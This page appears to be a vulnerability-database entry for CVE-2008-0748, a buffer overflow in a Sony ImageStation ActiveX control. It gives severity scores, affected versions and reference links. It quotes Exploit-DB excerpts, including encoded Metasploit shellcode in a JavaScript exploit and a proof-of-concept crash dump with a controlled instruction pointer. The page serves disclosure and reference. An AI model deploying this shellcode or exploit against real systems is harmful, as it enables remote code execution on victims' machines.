CVE-2008-0748
published 2008-02-13CVE-2008-0748: Buffer overflow in the Sony AxRUploadServer.AxRUploadControl.1 ActiveX control in AxRUploadServer.dll 1.0.0.38 in SonyISUpload.cab 1.0.0.38 for Sony…
PriorityP349critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
16.16%
96.5th percentile
Buffer overflow in the Sony AxRUploadServer.AxRUploadControl.1 ActiveX control in AxRUploadServer.dll 1.0.0.38 in SonyISUpload.cab 1.0.0.38 for Sony ImageStation allows remote attackers to execute arbitrary code via a long argument to the SetLogging method. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sony | axruploadserver_activex_control | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow
exploitdb·2008-02-10
CVE-2008-0748 ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow
ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow
---
ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754
Exploit-DB
ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)
exploitdb·2008-02-08
CVE-2008-0748 ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)
ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)
---
Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging)
Dll name:AxRUploadServer.dll
Download: http://www.imagestation.com/common/classes/SonyISUpload.cab?v=1,0,0,38
Description:
This file belongs to ImageStation that is a servicemark of Sony Electronics Inc.
Internal name:
The ez-Upload control.
Access Violation when executing 0x42424242
........................................
Registers:
EIP 42424242
EAX 42424242
EBX 00000001
ECX 00FE50B0 -> 00FE0290
EDX 00FE0608 -> 00187440 -> Uni: @t@t
EDI 00000000
ESI 00000000
EBP 0013E6C4 -> 0013E6E4
ESP 0013E68C -> 0145636A -> Asc: jcEjcE
Discovered by:
Trancek, http://www.trancek.es
Greetz: p1mp4m.es(sky, pepepistola, elvispresley, pato
No writeups or analysis indexed.
http://secunia.com/advisories/28854http://securityreason.com/securityalert/3648http://www.securityfocus.com/archive/1/487802/100/0/threadedhttp://www.securityfocus.com/archive/1/487805/100/0/threadedhttp://www.securityfocus.com/bid/27715http://www.vupen.com/english/advisories/2008/0483https://www.exploit-db.com/exploits/5086https://www.exploit-db.com/exploits/5100http://secunia.com/advisories/28854http://securityreason.com/securityalert/3648http://www.securityfocus.com/archive/1/487802/100/0/threadedhttp://www.securityfocus.com/archive/1/487805/100/0/threadedhttp://www.securityfocus.com/bid/27715http://www.vupen.com/english/advisories/2008/0483https://www.exploit-db.com/exploits/5086https://www.exploit-db.com/exploits/5100
2008-02-13
Published